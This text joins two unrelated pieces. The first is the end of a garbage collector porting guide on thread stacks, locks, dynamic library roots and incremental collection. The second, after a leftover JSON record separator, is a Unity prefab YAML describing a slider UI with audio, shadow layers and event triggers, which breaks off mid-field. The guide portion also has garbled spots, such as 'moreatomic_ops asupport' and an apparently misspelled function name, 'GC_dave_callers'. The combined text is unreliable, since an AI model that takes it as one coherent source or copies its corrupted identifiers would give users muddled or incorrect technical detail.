GC_push_all_stacks()\n
\nPush the contents of all thread stacks (or at least of pointer-containing\nregions in the thread stacks) onto the mark stack.\n
\nThese very often require that the garbage collector maintain its\nown data structures to track active threads.\n

\nIn addition, LOCK and UNLOCK must be implemented\nin gc_locks.h\n

\nThe easiest case is probably a new pthreads platform\non which threads can be stopped\nwith signals. In this case, the changes involve:\n

    \n
  1. Introducing a suitable GC_X_THREADS macro, which should\nbe automatically defined by gc_config_macros.h in the right cases.\nIt should also result in a definition of GC_PTHREADS, as for the\nexisting cases.\n
  2. For GC7+, ensuring that the atomic_ops package at least\nminimally supports the platform.\nIf incremental GC is needed, or if pthread locks don't\nperform adequately as the allocation lock, you will probably need to\nensure that a sufficient atomic_ops port\nexists for the platform to provided an atomic test and set\noperation. (Current GC7 versions require moreatomic_ops\nasupport than necessary. This is a bug.) For earlier versions define\nGC_test_and_set in gc_locks.h.\n
  3. Making any needed adjustments to pthread_stop_world.c and\npthread_support.c. Ideally none should be needed. In fact,\nnot all of this is as well standardized as one would like, and outright\nbugs requiring workarounds are common.\n
\nNon-preemptive threads packages will probably require further work. Similarly\nthread-local allocation and parallel marking requires further work\nin pthread_support.c, and may require better atomic_ops\nsupport.\n

Dynamic library support

\nSo long as DATASTART and DATAEND are defined correctly,\nthe collector will trace memory reachable from file scope or static\nvariables defined as part of the main executable. This is sufficient\nif either the program is statically linked, or if pointers to the\ngarbage-collected heap are never stored in non-stack variables\ndefined in dynamic libraries.\n

\nIf dynamic library data sections must also be traced, then\n

    \n
  • DYNAMIC_LOADING must be defined in the appropriate section\nof gcconfig.h.\n
  • An appropriate versions of the functions\nGC_register_dynamic_libraries() should be defined in\ndyn_load.c. This function should invoke\nGC_cond_add_roots(region_start, region_end, TRUE)\non each dynamic library data section.\n
\n

\nImplementations that scan for writable data segments are error prone, particularly\nin the presence of threads. They frequently result in race conditions\nwhen threads exit and stacks disappear. They may also accidentally trace\nlarge regions of graphics memory, or mapped files. On at least\none occasion they have been known to try to trace device memory that\ncould not safely be read in the manner the GC wanted to read it.\n

\nIt is usually safer to walk the dynamic linker data structure, especially\nif the linker exports an interface to do so. But beware of poorly documented\nlocking behavior in this case.\n

Incremental GC support

\nFor incremental and generational collection to work, os_dep.c\nmust contain a suitable \"virtual dirty bit\" implementation, which\nallows the collector to track which heap pages (assumed to be\na multiple of the collectors block size) have been written during\na certain time interval. The collector provides several\nimplementations, which might be adapted. The default\n(DEFAULT_VDB) is a placeholder which treats all pages\nas having been written. This ensures correctness, but renders\nincremental and generational collection essentially useless.\n

Stack traces for debug support

\nIf stack traces in objects are need for debug support,\nGC_dave_callers and GC_print_callers must be\nimplemented.\n

Disclaimer

\nThis is an initial pass at porting guidelines. Some things\nhave no doubt been overlooked.\n\n\n"} {"text": "%YAML 1.1\n%TAG !u! tag:unity3d.com,2011:\n--- !u!1 &127278\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22458224}\n - component: {fileID: 22204108}\n - component: {fileID: 11446796}\n - component: {fileID: 11406834}\n m_Layer: 5\n m_Name: HandleShadow\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &134094\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22428218}\n - component: {fileID: 22269208}\n - component: {fileID: 11438712}\n m_Layer: 5\n m_Name: Fill\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &134108\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22490904}\n - component: {fileID: 11475534}\n - component: {fileID: 22254268}\n - component: {fileID: 11491604}\n - component: {fileID: 11498930}\n - component: {fileID: 8294126}\n - component: {fileID: 11498694}\n - component: {fileID: 11406732}\n m_Layer: 5\n m_Name: Slider\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &171538\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22438182}\n - component: {fileID: 22299814}\n - component: {fileID: 11475722}\n m_Layer: 5\n m_Name: Background\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &172600\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22407934}\n - component: {fileID: 22265642}\n - component: {fileID: 11427430}\n - component: {fileID: 8255302}\n m_Layer: 5\n m_Name: Handle\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &178996\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22471362}\n m_Layer: 5\n m_Name: Handle Slide Area\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &195914\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22443340}\n - component: {fileID: 11402230}\n - component: {fileID: 22274596}\n - component: {fileID: 11447180}\n m_Layer: 5\n m_Name: Fill Area\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!82 &8255302\nAudioSource:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_Enabled: 1\n serializedVersion: 4\n OutputAudioMixerGroup: {fileID: 0}\n m_audioClip: {fileID: 8300000, guid: 8e6c730d6464e37459410b383be0a610, type: 3}\n m_PlayOnAwake: 0\n m_Volume: 1\n m_Pitch: 1\n Loop: 1\n Mute: 0\n Spatialize: 0\n SpatializePostEffects: 0\n Priority: 128\n DopplerLevel: 1\n MinDistance: 1\n MaxDistance: 500\n Pan2D: 0\n rolloffMode: 0\n BypassEffects: 0\n BypassListenerEffects: 0\n BypassReverbZones: 0\n rolloffCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n - serializedVersion: 2\n time: 1\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n panLevelCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n spreadCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n reverbZoneMixCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n--- !u!82 &8294126\nAudioSource:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n serializedVersion: 4\n OutputAudioMixerGroup: {fileID: 0}\n m_audioClip: {fileID: 8300000, guid: 5f36a7cd636bd6f409db8c8d7b07109d, type: 3}\n m_PlayOnAwake: 0\n m_Volume: 1\n m_Pitch: 1\n Loop: 0\n Mute: 0\n Spatialize: 0\n SpatializePostEffects: 0\n Priority: 128\n DopplerLevel: 1\n MinDistance: 1\n MaxDistance: 500\n Pan2D: 0\n rolloffMode: 0\n BypassEffects: 0\n BypassListenerEffects: 0\n BypassReverbZones: 0\n rolloffCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n - serializedVersion: 2\n time: 1\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n panLevelCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n spreadCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n reverbZoneMixCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n--- !u!114 &11402230\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -1200242548, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_ShowMaskGraphic: 0\n--- !u!114 &11406732\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: a6124de87eead3d43a9f23cd33163506, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n source: {fileID: 8255302}\n--- !u!114 &11406834\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: c18c90a2199d9c742ae0f95fbd2fa06c, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n Slider: {fileID: 22490904}\n Handle: {fileID: 22407934}\n--- !u!114 &11427430\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: 39f2acd6dcf9f4f4c9af81ced4886ad4, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11438712\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 0.72156864, g: 0.72156864, b: 0.72156864, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: c30b6490f98cb3240a6c34e69e75a5d5, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11446796\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 0.209}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: efd7b9a745721a9429ec215224240cb0, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11447180\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 0}\n m_Type: 0\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11475534\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -113659843, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Navigation:\n m_Mode: 3\n m_SelectOnUp: {fileID: 0}\n m_SelectOnDown: {fileID: 0}\n m_SelectOnLeft: {fileID: 0}\n m_SelectOnRight: {fileID: 0}\n m_Transition: 1\n m_Colors:\n m_NormalColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 1}\n m_HighlightedColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 1}\n m_PressedColor: {r: 0.78431374, g: 0.78431374, b: 0.78431374, a: 1}\n m_DisabledColor: {r: 0.86666673, g: 0.86666673, b: 0.86666673, a: 0.5019608}\n m_ColorMultiplier: 1\n m_FadeDuration: 0.1\n m_SpriteState:\n m_HighlightedSprite: {fileID: 0}\n m_PressedSprite: {fileID: 0}\n m_DisabledSprite: {fileID: 0}\n m_AnimationTriggers:\n m_NormalTrigger: Normal\n m_HighlightedTrigger: Highlighted\n m_PressedTrigger: Pressed\n m_DisabledTrigger: Disabled\n m_Interactable: 1\n m_TargetGraphic: {fileID: 11427430}\n m_FillRect: {fileID: 22428218}\n m_HandleRect: {fileID: 22407934}\n m_Direction: 0\n m_MinValue: 0\n m_MaxValue: 1\n m_WholeNumbers: 0\n m_Value: 0.652\n m_OnValueChanged:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 11406732}\n m_MethodName: setSliderSoundVolume\n m_Mode: 0\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.UI.Slider+SliderEvent, UnityEngine.UI, Version=1.0.0.0,\n Culture=neutral, PublicKeyToken=null\n--- !u!114 &11475722\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 1}\n m_RaycastTarget: 0\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: c30b6490f98cb3240a6c34e69e75a5d5, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11491604\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -765806418, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Material: {fileID: 0}\n m_Color: {r: 1, g: 1, b: 1, a: 0.153}\n m_RaycastTarget: 1\n m_OnCullStateChanged:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.UI.MaskableGraphic+CullStateChangedEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n m_Sprite: {fileID: 21300000, guid: eccec04b76ecffb408e4145c9c3777bd, type: 3}\n m_Type: 1\n m_PreserveAspect: 0\n m_FillCenter: 1\n m_FillMethod: 4\n m_FillAmount: 1\n m_FillClockwise: 1\n m_FillOrigin: 0\n--- !u!114 &11498694\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -1862395651, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_Delegates:\n - eventID: 13\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8255302}\n m_MethodName: Play\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n - eventID: 2\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8294126}\n m_MethodName: PlayOneShot\n m_Mode: 2\n m_Arguments:\n m_ObjectArgument: {fileID: 8300000, guid: 950e6e66be1f197459ac2cc4676f2af2,\n type: 3}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.AudioClip, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n - m_Target: {fileID: 11498930}\n m_MethodName: Retract\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n - eventID: 3\n callback:\n m_PersistentCalls:\n m_Calls:\n - m_Target: {fileID: 8294126}\n m_MethodName: PlayOneShot\n m_Mode: 2\n m_Arguments:\n m_ObjectArgument: {fileID: 8300000, guid: 409e434d2f294004794cabc31135207f,\n type: 3}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.AudioClip, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n - m_Target: {fileID: 11498930}\n m_MethodName: Expand\n m_Mode: 1\n m_Arguments:\n m_ObjectArgument: {fileID: 0}\n m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine\n m_IntArgument: 0\n m_FloatArgument: 0\n m_StringArgument: \n m_BoolArgument: 0\n m_CallState: 2\n m_TypeName: UnityEngine.EventSystems.EventTrigger+TriggerEvent, UnityEngine.UI,\n Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n delegates: []\n--- !u!114 &11498930\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: e3e6328679392734ea8291f8dc868266, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n Layers:\n - Label: Background Layer\n LayerTransform: {fileID: 22438182}\n MaxFloatDistance: 0.005\n MinFloatDistance: 0\n Shadow: {fileID: 11491604}\n ShadowOnAboveLayer: 0\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n - Label: Fill Area Layer\n LayerTransform: {fileID: 22443340}\n MaxFloatDistance: 0.005\n MinFloatDistance: 0\n Shadow: {fileID: 0}\n ShadowOnAboveLayer: 0\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n - Label: Handle Slide Area Layer\n LayerTransform: {fileID: 22471362}\n MaxFloatDistance: 0.01\n MinFloatDistance: 0\n Shadow: {fileID: 11446796}\n ShadowOnAboveLayer: 1\n TriggerLayerEvent: 0\n MaxShadowOpacity: 0\n CurrentFloatingDistance: 0\n touchingFinger: 0\n distanceToAboveLayer: 0\n maxDistanceToAboveLayer: 0\n ExpandSpeed: 0.2\n ContractSpeed: 0.2\n PushPaddingDistance: 0\n LayerDepress:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n LayerCollapse:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n LayerExpand:\n m_PersistentCalls:\n m_Calls: []\n m_TypeName: UnityEngine.Events.UnityEvent, UnityEngine.CoreModule, Version=0.0.0.0,\n Culture=neutral, PublicKeyToken=null\n--- !u!222 &22204108\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n--- !u!222 &22254268\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n--- !u!222 &22265642\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n--- !u!222 &22269208\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n--- !u!222 &22274596\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n--- !u!222 &22299814\nCanvasRenderer:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n--- !u!224 &22407934\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22471362}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 0}\n m_AnchoredPosition: {x: 0.000015258789, y: 0}\n m_SizeDelta: {x: 80, y: 0}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22428218\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134094}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -0.00001071}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22443340}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 0}\n m_AnchoredPosition: {x: 2.4999847, y: 0}\n m_SizeDelta: {x: 5, y: 0}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22438182\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 171538}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22490904}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 1.0403948, y: 2}\n m_SizeDelta: {x: -24.019, y: -20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22443340\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -3.553e-12}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22428218}\n - {fileID: 22458224}\n m_Father: {fileID: 22490904}\n m_RootOrder: 1\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 0.000036597252, y: 2}\n m_SizeDelta: {x: -26.1, y: -20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22458224\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 127278}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children: []\n m_Father: {fileID: 22443340}\n m_RootOrder: 1\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 0, y: 1}\n m_AnchoredPosition: {x: 241.9, y: -0.000002861023}\n m_SizeDelta: {x: 166, y: 111.42851}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22471362\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 178996}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: -0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22407934}\n m_Father: 